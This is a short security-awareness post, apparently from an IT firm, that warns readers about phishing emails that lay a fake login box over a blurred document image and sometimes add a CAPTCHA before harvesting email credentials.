Image overlay is when a hacker creates a blurred image of a document that resembles a form you would recognize and overlays it with a login prompt. The image is designed to pique your interest or create a sense of importance or value. The concept of image overlay isn’t new, but today it has a new twist. The login box overlay is intended to steal your email credentials. Let’s look at a few samples.
I’m sure it’s not news to any of you that hackers frequently reuse companies’ logos to try and look credible. Nothing is special about the email in Figure 1. It gets interesting only when you click on the link. Figure 2 shows a very typical image overlay – you feel like you can almost read what’s in it, but the box is in the way. That’s how they get you.
Remember, cybercriminals are always just one step behind us. As we start putting “confidential” in our email to alert our clients, hackers start putting “confidential” in their phishing emails. We use Zix and other tools for email encryption. The hackers are right behind us, making their emails look like encrypted messages.
This next example is no different. At first, once again, you see a reasonably typical email in Figure 3. Figure 4 shows a standard overlay image you’ll see once you open the attachment. Figure 5 shows the new twist – CAPTCHA or antibot protection. I’m sure you’ve seen it before, where a legitimate website will try to determine whether you’re a human or a bot using CAPTCHA or a similar technology. The hacker is doing the same thing. He wants to make sure you’re a human. It’s thoughtful, right, and reassuring? No so fast. Figure 6 is precisely what you would expect: credential harvesting.
Always be ready for something new. Think before you click and be safe.